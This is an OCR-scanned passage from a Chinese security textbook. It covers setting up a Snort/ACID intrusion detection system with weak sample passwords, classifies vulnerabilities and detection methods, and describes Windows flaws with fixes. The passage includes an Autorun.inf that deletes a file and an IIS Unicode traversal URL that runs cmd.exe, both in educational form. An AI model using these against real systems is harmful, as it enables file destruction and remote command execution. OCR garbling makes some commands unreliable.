6-4 ”Snort 安装 界面 一 一 目录 选择 


(3) MySQL 安装 。 这 里 使 用 的 是 MySQL 5. 5 for Win32 的 完整 安装 程序 。 软 件 包 的 


安装 较 简单 ,服务 端 和 客户 端 程序 是 必 选 组 件 ,其 他 可 根据 需要 选择 安装 。 建 议 安装 在 非 系 
统 分 区 。 安 装 过 程 如 图 6-5 一 图 6-10 所 示 。 
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国 Ny5QL Installer 


Welcome MysSQL. 


The MYSQL Instaler guides you through the mstalation and configuration of your 
MySQL products. Run it fom the Start Menu to perform maintenance tasks later, 


Select one of the actions below: 


转 naalmsotproduds 


SR Sude You through the nstalation and configuration of your 
My5QL products, 


About MysQL 


Learn more about My5QL produets and better understand how 
You can benefit the most, 


Resources 


Get more information on how to install My5QL and configuret 
to run efficiently on your machine. 


Copyright © 2012, Oracle andjor ns Affilates, Al rights reserved, Oradle i 
Oracle Corporation andfor is ailates, Oher names may be trademarks 


图 6-5 MySQL 安装 界面 1 
图 aysQqL Installer 


| 
License A' t 
MySQL. Installer dh eal 


To install MySQL, you must accept the Oracle Software License Terms. 


GNU GENERAL PUBLIC LICENSE 
Version 2, June 1991 


Copyright (C) 1989, 1991 Free software Foundation, Inc,, 
1 Frankin Street, Fifth Floor, Boston, MA 02110-1301 USA 
Veryone is permitted to copy and distribute verbatim copies 

this icense document, but changing Kis not alowed. 
Preamble 


[The licenses for most software are designed to take away your freedom 
ko share and change K, By contrast, the GNU General Public License is 
ntended to guarantee your freedom to share and change free 
tware—to make sure the software is free for all ks users, This 
General Publc License apples to most of the Free Software 
undation's software and to any other program whose authors commit to 
using RK, (Some other Free Software Foundation software is covered by 
he GNU Library General Publc License nstead.) YOU can apply Kto 
our programs, too, 


we speak of free software, we are referring to freedom, not price, 
General Public Licenses are designed to make sure that you have 
he freedom to distribute copies of free software (and charge for th 
service if you wish), that YOU receive source code of can get Rif you 
rant K, that you can change the software or use pieces of t in new 
ree programs; and that you know you can do these things, 


he eense terms} 


图 6-6 MySQL 安装 界面 2 
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国 了 SQL Installer 


RN 
MySQL. Installer 


国 MySQL Installer 


RK 
MySQL. Installer 


Choosing a Setup Type 


Please select the Setup Type that suits your use case. 


© Developer Default 


Installs al products needed For 
My5QL development purposes. 


© Server only 


Instals only the My5QL Server 
product, 


© chient only 
Installs only the My5QL Chent 
products, without a server, 


加 Full 
Installs all included My5QL products 
and features. 


© custom 


Manually select the products that 
should be installed on the system, 


Setup Type Description 
instals al oF the products avallable in this catalog 
lincluding My5QL Server, My5QL Workbench, 
MySQL Connectors documentation, samples and 
[examples and much more 


Installation Path: ~ 


:Program Files\MySQL\ 国 


Data Path 


EBocuments and Settings\Al Users\Applcal [. 


图 6-7 MySQL 安装 界面 3 


Installation Progress 


The following products will be installed or updated. 


| Product 
mT 
My5QL Server 5.5.29 


MySQ Notifier 1.0.3 
Connector/JODBC 5.1.11 


Connector/C++ 1,1.0 
Connector/C 6.0.2 


Connector/]5.1.20.0 
Connector/NET 6.5.4 


My5QL Workbench CE 5.2.44 


My5QL Documentation 5.5.29 
Samples and Examples 5.5.29 


图 6-8 MySQL 安装 界面 4 


wn 
汶 
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国 aysoL Installer 


MySQL Server Configuration 


MySQL. Installer 


Server Configuration Type 


Choose the correct server configuration type for this MySQL Server 
natallaion, This setting wil define how much system resources are assigned 
to the MySQL Sarver instance, 


Enable this to alow TCP/IP networking, 
through named pipes are slowed when 


Only localhost connections 
is option ts skipped 


Port Number: |3306 
回 Open Firewall port for network access 


Advanced Configuration 


DS 


图 6-9 


[2 


Installer 


x 
MySQL. Installer 


Sealect the checkbox below to get 2ddiional confgur ation page where 
You can set advanced opotions for this server instance， 


口 Show Advanced Options 


MySQL 安装 界面 5 


MySQL Server Configuration 


Root Account Password 


星 


Enter the password for the root account，Please remember to store 
this password in a secure place, 


MySQL Root Password: 
可 


Password Strength: Weak 


Repeat Password: 


MySQL User Accounts 


里 


图 6-10 


Create My5QL user accounts For your users and applications， 
Assign a role to the user that consists of a set of privieges. 


My5QL Userna.., Host User Role 


Et User 


MySQL 安装 界面 6 
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安装 完毕 后 ,进入 MySQL 控制 台 ,建立 Snort 运行 必需 的 SNORT 数据 库 和 SNORT_ 
ARCHIVE 数据 库 。 


d:\Program Files\MySQL\MySQL Server 5.0\bin>mysql -uroot -P 
Enter password: (安装 时 设 定 的 密码 ) 

mysql > Create database snort; 

mysql > create database snort archive; 


使 用 D:\Snort\schemas 目录 下 的 create_mysql 脚本 建立 Snort 运行 必需 的 数据 表 。 
在 命令 行 方式 下 分 别 输入 和 执行 以 下 两 条 命令 。 


c:\mysql\bin\mysql —D snort -uroot -p<d:N\snort\schemasNcreate_mysql 
c:\mysql\bin\mysql 一 D snort archive -uroot -p<d:Nsnort\schemasNcreate_mysql 


在 本 地 数据 库 中 建立 acid 和 snort 两 个 用 户 。 本 例 中 ,密码 全 部 用 “1234”。 


mysql > grant usage on *.* to "acid"@"localhost" identified by "1234"; 
mysql > grant usage on *.* to "snort"@localhost" identified by "1234"; 


为 acid 用 户 和 snort 用 户 分 配 相关 权限 。 


mysql > grant select, insert, update, delete, create, alter on snort . * to "snort"@"localhost"; 
mysql > grant select, insert, update, delete, create,alter on snort . * to "acid"@"localhost"; 
mysql > grant select, insert, update, delete, create, alter on snort archive .* 

to "acid"@"localhost"; 

mysql > grant select, insert, update, delete, create alter on snort archive .* 

to "snort"@"localhost"; 


(4) Apache 安装 。 安 装 Apache 至 C:\ids\apache, 测 试 Apache 站 点 。 但 需要 注意 监 
听 端 口 ,由 于 Windows IIS 中 的 Web 服务 器 默认 情况 下 在 TCP 80 端口 监听 连接 请 求 ,而 
8080 端口 一 般 留 给 代理 服务 器 使 用 .因此 为 了 避免 Apache Web 服务 器 的 监听 端口 与 其 发 
生 冲 突 , 将 Apache Web 服务 器 的 监听 端口 修改 为 不 常用 的 高 端 端口 50080。 

(5) Php 安装 。 安 装 Php 至 C:\ids\php5。 

@ 将 Php5ts. dll 复制 到 C:\windowsNsystem32 下 ,把 Php. int-dist 复制 到 C:\windows 
下 ,并 重新 命名 为 Php. ini。 

@ 添加 GD 图 形 库 的 支持 ,将 Phi. ini 中 把 * ;extension 一 php_gd2. dll” 和 * ;extension 一 
php_mysql. dll” 这 两 条 语句 前 面 的 分 号 (注释 ) 去 掉 。 

@ 将 C:\ids\php5\ext 下 的 文件 php_gd2. dll,php_mysql. dll 复制 至 C:\windows 下 ; 
将 php_mysql. dll 复制 至 C:\windows\system32 下 ; 将 C:\ids\php5\libmysql. dll 复制 至 
C:\windows\system32 下 。 此 外 ,还 需 修改 php. ini 中 extension_dir 指定 路 径 extension_ 
dir 一 c:/php/ext( 根 据 php 安装 路 径 中 的 目录 名 来 设 定 )。 

@ 添加 Apache 对 PHP 的 支持 。 在 C:\ids\apache\conf\httpd. conf 的 末尾 添加 以 下 
语句 : 
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LoadModule php5_module c:/ids/php5/php5apache2 2.d1l 
AddType application/x— httpd— php .php 


php. ini 不 需要 复制 到 Windows 目录 中 (也 可 以 复制 到 Windows 目录 中 ), 只 要 在 
httpd. conf 中 作 如 下 指定 : 


PHPIniDir "c:\php" 


@ 重启 Apache。 

在 C:\ids\APACHE\htdocs 目录 下 新 建 TEST. PHP, 内 容 为 “<? phpinf0();? >”。 
在 IE 中 使 用 http://localhost/test. php 测试 PHP 是 否 成 功 安装 。 使 用 http:// 你 的 ip 地 
址 /test. php。 

(6) Adodb 安装 。 将 Adodb 解压 至 C:\ php5\adodb 目录 下 即 可 。 

(7) 安装 配置 数据 控制 台 ACID。 首 先 , 将 ACID 解压 至 C \apache\htdocsNacid 目 


录 下 。 


修改 该 目录 下 的 ACID_ CONF.PHP 文件 ,修改 内 容 如 下 。 


”DBlib_path 一 "c:\php5Nadodb"。 
$DBtype 一 "mysql" 。 


$alert_dbname 一 "snort"。 

$ alert_host 一 "localhost" 。 
$ alert_port 一 "3306"。 

$ alert_user 一 "acid" 。 


; alert_password 一 "acidtest " 。 


存档 数据 库 连接 参数 设置 如 下 。 

。 $archive_dbname 一"snort_archive" 。 
。 $archive_host 一 "localhost"。 

。 $archive_port 一 "3306"。 

。 $archive_user 一 "acid"。 


$ archive_password 一 "acidtest" 。 
$ ChartLib_path="c:\php5\jpgraph\sre"。 


然后 ,重启 Apache 服务 。 建 立 ACID 运行 必需 的 数据 库 。 在 IE 中 输入 “http:// 
localhost/acid/acid_db_setup. php”, 打 开 页 面 后 , 单 击 Create ACID AG 按钮 ,建立 数据 库 ， 
如 图 6-11 所 示 。 

(8) 将 Snort 规则 放 入 解压 D:\snort 目录 下 。 和 解压 规则 库 , 放 到 D:\snort 目录 下 , 编 
辑 D:\snort\etc\snort. conf。 


需要 修改 的 地 方 如 下 : 


include classification. config 
include reference. config 


第 6 章 入 侵 检测 技术 149 


D: DB Seta osoft Internet Ezple 二 对 
文件 四 ”编辑 中 查看 收藏 岂 工具 中 天助 吕 E23 
DR-O-RDd Pa TW HM OO SB | 
WE 外 htp /olhost/acid/scia tsetoprhs 司 | 回 | 时 这 >” 
De Se ne me 
[Back] 
ACID tables Adds tables to extend the Snort DB to support the ACID functionality Create ACID AG | 
Search Indexes (Optional) Adds indexes to the Snort DB to optimize the speed of the DONE 
queries 


[Loaded in 1 seconds] 


Roman Danyliw AirCERT 


图 6-11 建立 ACID 运行 必需 的 数据 库 
改 为 绝对 路 径 


include d:\snort\etc\classification. config 
include d:\snort\etc\reference. config 


设置 snort 输出 alert 到 mysql server。 


output database: log,mysql, user = root password = mysql dbname = snort 
host = localhost 

var HOME_NET 192.168.1.0/24 ---- (用 户 所 处 的 网 段 ) 

var RULE_PATH d:\Snort\rules —---—— (规则 文件 存放 的 目录 ) 
dynamicpreprocessor directory d:\Snort\lib\snort_dynamicpreprocessor 
dynamicengine d:\Snort\lib\snort dynamicengine\sf engine.dll 


(9) 启动 Snort。 


d:\snort\bin> snort ~c "d:\snort\etc\snort.conf" —~1"d:\snort\logs"” ~ i2 -d-e-xX 


一 X 参数 用 于 在 数据 链接 层 记录 raw packet 数据 。 

一 4 参数 用 于 记录 应 用 层 的 数据 。 

一 e 参 数 用 于 显示 /记录 第 二 层 报 文 头 数据 。 

一 c 参数 用 以 指定 snort 的 配置 文件 的 路 径 。 

一 i 指明 监听 的 网 络 接口 。 

(10) 测试 Snort。 在 下 浏览 器 中 输入 “http://localhost/acid/acid_main. php”, 进 入 
ACID 分 析 控制 台 主 界面 ,从 中 便 可 以 查看 统计 数据 ,如 图 6-12 所 示 。 至 此 ,基于 SNORT 
的 入 侵 检测 系统 配置 结束 。 后 续 工作 则 是 完善 SNORT 规则 配置 文件 。 
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文 卖 四 “办 竹 四， 查看 轨 ， 收 靖国 “工具 四 笨 屿 四 i | 包 
名 银 昌 -日 个 | 月 名 二 本 克 如 | DD 与 
ME) [EJ ets // 19 ie 1 9/ ec/ eed main po SPENCE 


Analysis Console for Intrusion Databases 


Added 0 alert(s) to the Alert cache 


Queried on : Sat December 01,2007 Lh 56 
Database: snortlocalhost-3305 schema version: 
Time window: [2007-12.01 16.35.33] - oor 12.0117 及 18] 


[Sensors: 1 [Traffic Profile by Protocol 
Unique Alerts: 5 TCP CY 
[Total Number of Alers: 2103 全 
Pp 
® Source IP addresses 12 OT 
® Dest IP addresses: 6 
© Unique IP links 27 ICMP (1%) 
® Source Ports: 35 
OTCP G) UDP (4) Portscan Traffic {0%) 
» Dest Ports: 
bee UDP (1) 
® Search 晤 
® Graph Alert data 
Snapshot 
® Most recent Alerts any protocol, TCP, UDP, ICMP ® Most frequent 5 Alerts 
® Today's' alerts unique, listing; IP src / dst 
© Last 24 Hours. alerts unique, listing; IP src / dst ® Most Frequent Source Ports: any , TCP , UDP 
© Last 72 Hours alerts unique, listing, IP src / dst @ Most Frequent Destination Ports: any , Tcp ， UDP 


® Most recent 15 Unique Alerts 
® Most frequent 15 addresses: source, destination 


应 加 辕 | [EET 


@ 1ast Snurra Pars anvy_TCP_ NDP 


图 6-12 ”Snort 运行 测试 结果 


6.3 漏洞 检测 技术 和 系统 漏洞 检测 工具 


漏洞 是 指 一 个 系统 存在 的 弱点 或 缺陷 ,系统 对 特定 威胁 攻击 或 危险 事件 的 敏感 性 ,或 进 
行 攻击 的 威胁 作用 的 可 能 性 。 漏 洞 可 能 来 自 应 用 软件 或 操作 系统 设计 时 的 缺陷 或 编码 时 产 
生 的 错误 ,也 可 能 来 自 业 务 在 交互 处 理 过 程 中 的 设计 缺陷 或 逻辑 流程 上 的 不 合理 之 处 。 这 
些 缺 陷 、 错 误 或 不 合理 之 处 可 能 被 有 意 或 无 意 地 利用 ,从 而 对 一 个 组 织 的 资产 或 运行 造成 不 
利 影响 ,如 信息 系统 被 攻击 或 控制 ,重要 资料 被 窃取 ,用 户 数据 被 算 改 ,系统 被 作为 人 侵 其 他 
主机 系统 的 跳板 。 从 目前 发 现 的 漏洞 来 看 ,应 用 软件 中 的 漏洞 远 远 多 于 操作 系统 中 的 漏洞 ， 
特别 是 Web 应 用 系统 中 的 漏洞 更 是 占 信 息 系统 漏洞 中 的 绝 大 多 数 。 

漏洞 影响 到 的 范围 很 大 ,包括 系统 本 身 及 其 支撑 软件 ,网 络 客户 和 服务 器 软件 ,网 络 路 
巾 器 和 安全 防火 墙 等 。 换 而 言 之 ,在 这 些 不 同 的 软 硬 件 设备 中 都 可 能 存在 不 同 的 安全 漏洞 
问题 。 在 不 同 种 类 的 软 硬 件 设备 , 同 种 设备 的 不 同 版 本 之 间 , 由 不 同 设备 构成 的 不 同系 统 之 
间 , 以 及 同 种 系统 在 不 同 的 设置 条 件 下 .都 会 存在 各 自 不 同 的 安全 漏洞 问题 。 

对 网 络 信息 系统 的 安全 而 言 , 仅 具有 事后 追查 或 实时 报警 功能 的 安全 检测 装备 是 不 够 
的 ,还 需要 具备 系统 安全 漏洞 扫描 能 力 的 事先 检查 型 的 安全 工具 。 

系统 漏洞 检测 又 称 为 漏洞 扫描 ,就 是 对 重要 网 络 信息 系统 进行 检查 ,发现 其 中 可 被 攻击 
者 利用 的 漏洞 。 不 管 攻 击 者 是 从 外 部 还 是 从 内 部 攻击 某 一 网 络 系统 ,一 般 都 会 利用 该 系统 
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已 知 的 漏洞 。 因 此 ,漏洞 扫描 技术 应 该 用 在 攻击 者 入 侵 和 攻击 网 络 系统 之 前 。 
6.3.1 入 侵 攻 击 可 利用 的 系统 漏洞 类 型 


入 侵 者 常常 从 搜集 发现 和 利用 信息 系统 的 漏洞 来 发 起 对 系统 的 攻击 。 不 同 的 应 用 , 甚 
至 同一 系统 不 同 的 版 本 ,其 系统 漏洞 都 不 尽 相同 ,大 致 上 可 以 分 为 三 类 。 

1. 网 络 传输 和 协议 的 漏洞 

攻击 者 利用 网 络 传输 时 对 协议 的 信任 及 网 络 传输 的 漏洞 进入 系统 。 例 如 ,IP 欺骗 就 是 
利用 网 络 传输 时 对 IP 协议 的 信任 ; 而 网 络 嗅 探 器 则 利用 了 网 络 信息 明文 传送 的 弱点 。 另 
外 ,攻击 者 还 可 利用 协议 的 特性 进行 攻击 ,例如 ,对 TCP 序列 号 的 攻击 等 。 攻 击 者 还 可 以 设 
法 避 开 认证 过 程 , 或 通过 假冒 (如 源 地 址 ) 而 混 过 认证 过 程 。 例 如 ,有 的 认证 功能 是 通过 主机 
地 址 来 做 认证 的 ,一 个 用 户 通 过 认证 , 则 这 个 机 器 上 的 所 有 用 户 就 都 通过 了 认证 。 此 外 ， 
DNS、WHOIS、FINGER 等 服务 也 会 泄露 出 许多 对 攻击 者 有 用 的 信息 ,如 用 户 地 址 .电话 号 
码 等 。 

2. 系统 的 漏洞 

攻击 者 可 以 利用 服务 进程 的 bug 和 配置 错误 进行 攻击 。 因 为 系统 内 部 的 程序 可 能 存 
在 许多 bug, 因 此 ,存在 着 入侵 者 利用 程序 中 的 bug 来 获取 特权 用 户 权限 的 可 能 。 寡 取 系 统 
中 的 口令 是 最 简单 和 直截了当 的 攻击 方法 ,因而 对 系统 口令 文件 的 保护 方式 也 在 不 断 的 改 
进 。 口 令 文件 从 明文 (隐藏 口令 文件 ) 改 进 成 密 文 ,又 改进 成 使 用 阴影 (shadow) 的 方式 。 

3. 管理 的 漏洞 

攻击 者 可 以 利用 各 种 方式 从 系统 管理 员 和 用 户 那 里 诱骗 或 套 取 可 用 于 非法 进入 的 系统 
信息 ,包括 口令 .用户 名 等 。 

通过 对 入 侵 过 程 的 分 析 , 系 统 的 安全 漏洞 可 以 分 为 以 下 几 类 。 

(1) 可 使 远程 攻击 者 获得 系统 的 一 般 访 问 权 限 。 

(2) 可 使 远程 攻击 者 获得 系统 的 管理 权限 。 

(3) 远程 攻击 者 可 使 系统 拒绝 合法 用 户 的 服务 请 求 。 

(4) 可 使 一 般 用 户 获得 系统 管理 权限 。 

(5) 一 般 用 户 可 使 系统 拒绝 其 他 合法 用 户 的 服务 请 求 。 

从 系统 本 身 的 结构 看 ,系统 的 漏洞 可 分 为 以 下 几 类 。 

(1) 安全 机 制 本 身 存在 的 安全 漏洞 。 

(2) 系统 服务 协议 中 存在 的 安全 漏洞 。 

(3) 系统 .服务 管理 与 配置 的 安全 漏洞 。 

(4) 安全 算法 、 系 统 协议 与 服务 现实 中 存在 的 安全 问题 。 

按照 漏洞 的 形成 原因 ,漏洞 大 体 上 可 以 分 为 程序 逻辑 结构 漏洞 程序 设计 错误 漏洞 、 开 
放 式 协议 造成 的 漏洞 和 人 为 因素 造成 的 漏洞 。 

按照 漏洞 被 人 掌握 的 情况 ,漏洞 又 可 以 分 为 已 知 漏洞 .未 知 漏洞 和 0day 等 几 种 类 型 。 

从 作用 范围 角度 ,漏洞 又 可 以 分 为 远程 漏洞 (攻击 者 可 以 利用 并 直接 通过 网 络 发 起 攻击 
的 漏洞 ) 和 本 地 漏洞 (攻击 者 必须 在 本 机 拥有 访问 权限 前 提 下 才能 发 起 攻击 的 漏洞 )。 
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6.3.2 漏洞 检测 技术 分 类 


漏洞 检测 技术 可 采用 两 种 策略 , 即 被 动 式 策略 和 主动 式 策略 。 

前 者 是 基于 主机 的 检测 ,对 系统 中 不 合适 的 设置 .脆弱 的 密码 ,以 及 其 他 同安 全 策略 相 
抵触 的 对 象 进 行 检 查 。 后 者 是 基于 网 络 的 检测 ,通过 执行 一 些 脚本 文件 对 系统 进行 攻击 ,并 
记录 其 反应 ,从 而 发 现 其 中 漏洞 。 

根据 所 采用 的 技术 特点 ,漏洞 检测 技术 可 以 分 为 以 下 五 类 。 

(1) 基于 应 用 的 检测 技术 。 采 用 被 动 、 非 破坏 性 的 办 法 来 检查 应 用 软件 包 的 设置 ,发 现 
安全 漏洞 。 

(2) 基于 主机 的 检测 技术 。 采 用 被 动 、 非 破坏 性 的 办 法 对 系统 进行 检测 , 常 涉及 系统 内 
核 . 文 件 的 属性 、 操 作 系统 的 补丁 等 问题 。 这 种 技术 还 包括 口令 解密 ,因此 ,这 种 技术 可 以 非 
常 准确 地 定位 系统 存在 的 问题 ,发 现 系统 漏洞 。 其 缺点 是 与 平台 相关 ,升级 复杂 。 

(3) 基于 目标 的 检测 技术 。 采 用 被 动 、 非 破坏 性 的 办 法 检查 系统 属性 和 文件 属性 ,如 数 
据 库 \ 注 册 号 等 。 通 过 消息 摘要 算法 ,对 系统 属性 和 文件 属性 进行 散 列 (Hash) 函数 运算 。 
如 果 函 数 的 输入 有 一 点 变化 ,其 输出 就 会 发 生 大 的 变化 ,这 样 文件 和 数据 流 的 细微 变化 都 会 
被 感知 。 这 些 算 法 实现 是 运行 在 一 个 闭环 上 ,不 断 地 处 理 文件 和 系统 目标 属性 ,然后 产生 校 
验 数 , 把 这 些 校 验 数 同 原来 的 校 验 数 相 比较 ,一 旦 发 现 改变 就 通知 管理 员 。 

(4) 基于 网 络 的 检测 技术 。 采 用 积极 、 非 破坏 性 的 办 法 来 检验 系统 是 否 有 可 能 被 攻击 
而 崩溃 。 它 利用 了 一 系列 脚本 对 系统 进行 攻击 ,然后 对 结果 进行 分 析 。 网 络 检测 技术 常 被 
用 来 进行 穿 透 实验 和 安全 审计 。 这 种 技术 可 以 发 现 系统 平台 的 一 系列 漏洞 ,也 容易 安装 。 
但 是 它 容 易 影 响 网 络 的 性 能 。 

(5) 综合 的 技术 。 它 集中 了 以 上 4 种 技术 的 优点 , 极 大 地 增强 了 漏洞 识别 的 精度 。 


6.3.3 系统 漏洞 检测 方法 


系统 漏洞 检测 是 通过 一 定 的 技术 方法 主动 地 去 发 现 系统 中 未 知 的 安全 漏洞 。 现 有 的 漏 
洞 检测 方法 有 源 代码 扫描 、 反 汇编 代码 扫描 渗透 分 析 、 环 境 错误 注入 等 。 

1. 源 代码 扫描 

由 于 相当 多 的 安全 漏洞 在 源 代码 中 会 出 现 类 似 的 错误 ,因此 可 以 通过 匹配 程序 中 不 符 
合 规 则 的 部 分 (如 文件 结构 、 命 名 规则 、 函 数 、 堆 栈 指针 等 ), 从 而 发 现 程序 中 可 能 隐 含 的 缺 
陷 。 源 代码 扫描 技术 主要 针对 开放 源 代码 的 程序 ,因而 这 种 检测 技术 需要 熟练 掌握 编程 语 
言 , 并 预先 定义 出 不 安全 代码 的 审查 规则 ,通过 表达 式 匹 配 的 方法 检查 源 程序 代码 。 该 方法 
不 仅 能 够 发 现 程序 动态 运行 过 程 中 存在 的 安全 漏洞 ,而且 会 出 现 大 量 的 误 报 。 

2. 反 汇 编 代码 扫描 

对 于 不 公开 的 源 代码 程序 , 反 汇 编 代 码 扫 描 是 最 有 效 的 检测 方法 ,但 分 析 反 汇编 代码 需 
要 有 丰富 的 经 验 和 很 高 的 技术 。 采 用 反 汇 编 代 码 扫描 方法 可 以 自行 分 析 代 码 ,也 可 以 借助 
辅助 工具 得 到 目标 程序 的 汇编 脚本 语言 ,再 对 汇编 出 来 的 脚本 语言 使 用 扫描 方法 ,检测 不 安 
全 的 汇编 代码 序列 。 通 常 , 通 过 反 汇 编 代码 扫描 方法 可 以 检测 出 大 部 分 的 系统 漏洞 ,但 这 种 
方法 费时 费力 ,对 人 员 的 技术 水 平 要 求 很 高 ,也 同样 不 能 检测 到 程序 动态 运行 过 程 中 产生 的 
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安全 漏洞 。 

3. 渗透 分 析 

渗透 分 析 法 是 依据 已 知 安全 漏洞 检测 未 知 的 漏洞 ,但 是 渗透 分 析 以 事先 知道 系统 中 的 
某 种 漏洞 为 先决 条 件 。 渗 透 分 析 的 有 效 性 与 执行 分 析 的 程序 员 有 关 , 缺 乏 评估 的 客观 性 。 

4. 环境 错误 注入 

环境 错误 注入 法 是 软件 运行 的 环境 中 故意 注入 人 为 的 错误 ,并 验证 反应 一 一 这 也 是 验 
证 计算 机 和 软件 系统 容错 性 和 可 靠 性 的 一 种 有 效 方法 。 


6.3.4 常见 的 系统 漏洞 及 防范 


1. 利用 Windows XP 的 AutoRun 漏洞 删除 硬盘 文件 

AutoRun 是 指 在 Windows XP 系统 的 计算 机 中 插入 光盘 后 ,光盘 中 的 Autorun. inf 指 
定 的 程序 被 自动 运行 的 现象 。 利 用 Windows XP 的 AutoRun 漏洞 进行 攻击 的 过 程 如 下 。 

(1) 新 建 一 个 文本 文件 ,输入 以 下 内 容 : 


[AutoRun] 
Open = run\del c:\testl. txt 


(2) 保存 文件 ,将 该 文件 重 名 为 Autorun. inf。 

(3) 使 用 光盘 刻录 工具 刻录 一 张 光 盘 , 在 光盘 的 根 目 录 下 加 入 Autorun. inf 文件 。 

(4) 在 C 盘 的 根 目录 下 新 建 testl. txt 文件 。 

(5) 插入 光盘 并 让 其 自动 运行 。 

(6) 光盘 自动 运行 结束 后 ,查看 C 盘 根 目录 ,发 现 testl. txt 文件 已 被 删除 。 

2. IPC $ 默认 共享 漏洞 

IPC $ (Internet Process Connection) 是 共享 “命名 管道 ”的 资源 ,可 以 在 连接 双方 建立 
一 条 安全 的 通道 ,实现 对 远程 计算 机 的 访问 。 

Windows NT/2000/XP 提供 了 IPC$ 功能 ,在 初次 安装 系统 时 还 打开 了 默认 共享 , 即 
所 有 的 逻辑 共享 (C$、D$ 、E$…) 和 系统 目录 (ADMIN $ ) 共 享 。 所 有 这 些 共享 的 目的 都 
是 为 了 方便 管理 员 的 管理 ,但 在 有 意 无 意 中 导致 了 系统 安全 性 的 隐患 。 

1) 查看 共享 资源 

可 以 在 “运行 ? 栏 中 输入 "cmd”, 进 入 命令 提示 符 , 输 入 "net share”, 查 看 计算 机 中 的 共 
享 资源 ,找到 共享 目录 ,如 图 6-13 所 示 。 也 可 以 通过 “控制 面板 ”管理 工具 ”一 “计算 机 管 
理 ” 一 “共享 文件 夹 ” 展 开 项 ,查看 所 有 的 共享 资源 ,如 图 6-14 所 示 。 

2) 清除 共享 漏洞 

(1) 选择 “开始 ”一 控制 面板 ”管理 工具 ”服务 ?选项 ,找到 “Server” 服 务 ,停止 该 
服务 ,并 且 在 “属性 ”中 将 “启动 类 型 "设置 为 “手动 ”或 “已 禁用 ”。 

(2) 修改 注册 表 。 选 择 “ 开 始 ”> “运行” 命令 ,输入 “regedit” 进 入 “注册 表 编 辑 器 ”, 找 到 
HEKY_LOCAL MACHINE\System\CurrentControlSet\Services\ LanmanServer\Parameters 子 
键 ,在 右 侧 的 窗口 中 分 别 新 建 一 个 名 为 “AutoShareWks” 和 “AutoShareServer” 的 双 字 节 键 
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研 


GC: Documents and Settings\Adni 


图 6-13 用 net share 查看 计算 机 中 的 共享 资源 


三 计算 机 管理 
性 文件 中 ”操作 查看 Y) 窗口 和 帮助 人 
中小 | 和 且 | 国 | 日 脆 | 久 转 


加 计算 机 管理 (本 地 ) 共享 共享 路 径 关 型 
号 记 系统 工具 ET C WINDOYS Vindows 
事件 查看 器 Bt cs Windows 


针 - 馈 共享 文件 实 WS Di Windows 
汪 wn By Fi\dy Windows 
名 打开 文件 C23 E'\ Windows 


由 地 用 户 rs FN\ Windows 
om se 下 
加 设备 管理 器 RBIrcs Windows 远程 IFC 
图 存 村 
而 盘 矿 片 整理 程序 
磁盘 管理 
本 好 服务 和 应 用 程序 


图 6-14 用 “计算 机 管理 ”查看 计算 机 中 的 共享 资源 
值 ,并 且 将 值 设置 为 “0”。 


(3) 使 用 命令 提示 符 下 的 “net share” 命 令 也 可 以 很 好 地 消除 这 一 隐患 。 打 开 Windows 
自 带 的 记事 本 ,输入 如 下 内 容 : 


net share admin$ /del 
net share ipc $ /del 
net share c /del 


接 下 来 将 该 文件 保存 为 一 个 扩展 名 为 “. bat” 的 批 处 理 文件 。 最 后 ,运用 Windows | 
“任务 计划 ”功能 让 该 批 处 理 文件 在 每 次 开机 时 都 自动 运行 。 如 果 还 有 其 他 盘 使 用 了 共 
如 DD 盘 , 则 在 记事 本 中 添加 “net share d /del” 即 可 。 注意 , 精 入 时 不 要 关 赂 参数 之 前 前 
空格 。 
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3. Unicode 漏洞 

1) Unicode 漏洞 的 危害 

在 Unicode 字符 解码 时 ,IIS 4. 0/5. 0 存在 一 个 安全 漏洞 ,导致 用 户 可 以 远程 通过 IIS 执 
行 任意 命令 。 当 用 户 用 IIS 打开 文件 时 ,如 果 该 文件 名 包含 Unicode 字符 ,系统 会 对 其 进行 
解码 。 如 果 用 户 提供 一 些 特殊 的 编码 ,将 导致 IIS 错误 地 打开 或 者 执行 某 些 Web 根 目录 以 
外 的 文件 。 

未 经 授权 的 用 户 可 能 会 利用 IUSR_machinename 账号 的 上 下 文 空 间 访问 任何 已 知 的 
文件 。 该 账号 在 默认 情况 下 属于 Everyone 和 Users 组 的 成 员 , 因 此 任何 与 Web 根 目录 在 
同一 逻辑 驱动 器 上 的 能 被 这 些 用 户 组 访问 的 文件 都 可 能 被 删除 .修改 或 执行 。 

通过 此 漏洞 ,可 查看 文件 内 容 、 建 立 文件 夹 \ 删 除 文件 .复制 文件 且 改 名 .显示 目标 主机 
当前 的 环境 变量 、 把 某 个 文件 夹 内 的 全 部 文件 一 次 性 复制 到 另外 的 文件 夹 ,把 某 个 文件 夹 移 
动 到 指定 的 目录 和 显示 某 一 路 径 下 相同 文件 类 型 的 文件 内 容 等 。 

2) Unicode 漏洞 的 成 因 

Unicode 漏洞 的 成 因 可 大 致 归结 为 : 从 中 文 Windows JIS 4.0 十 SP6 开始 ,还 影响 中 文 
Windows 2000 十 IIS 5.0、 中 文 Windows 2000 十 IIS5.0 十 SP1。 它 们 利用 扩展 Unicode 字符 
(如 利用 “../” 取 代 “/” 和 “\”) 进 行 目录 遍历 漏洞 。 据 了 解 ,在 Windows NT 中 编码 为 
%cl1%9c, 在 Windows 2000 英文 版 中 编码 为 %c0%af。 

3) 漏洞 检测 

首先 ,对 网 络 内 的 Windows NT/2000 主机 ,可 以 在 I 下 地 址 栏 输入 http:// 主 机 地 址 / 
scripts/.. %ecl% le,. /winnt/system32/cmd. exe? /c 十 dir( 其 中 %cl%%lc 为 Windows 2000 
漏洞 编码 ,在 不 同 的 操作 系统 中 ,可 使 用 不 同 的 漏洞 编码 ) ,如 漏洞 存在 ,还 可 以 将 dir 换 成 
set 和 mkdir 等 命令 。 其 次 ,要 检测 网 络 中 某 IP 段 的 Unicode 漏洞 情况 ,可 使 用 如 X-Scan、 
RangeScan 扫描 器 、Unicode 扫描 程序 Uni2. pl 及 流光 Fluxay4. 7 和 SSS 等 扫描 软件 来 
检测 。 

4) 解决 方法 

若 网 络 内 存在 Unicode 漏洞 ,可 采取 如 下 方法 进行 补救 。 

(1) 限制 网 络 用 户 访问 和 调用 cmd 命令 的 权限 。 

(2) 若 没 必要 使 用 scriptS 和 MSADC 目录 .将 其 删除 或 改名 。 

(3) 安装 Windows NT 系统 时 不 要 使 用 默认 Winnt 路 径 , 可 以 改 为 其 他 的 文件 夹 。 

(4) 用 户 下 载 补丁 程序 。 

4. IDQ 溢出 漏洞 

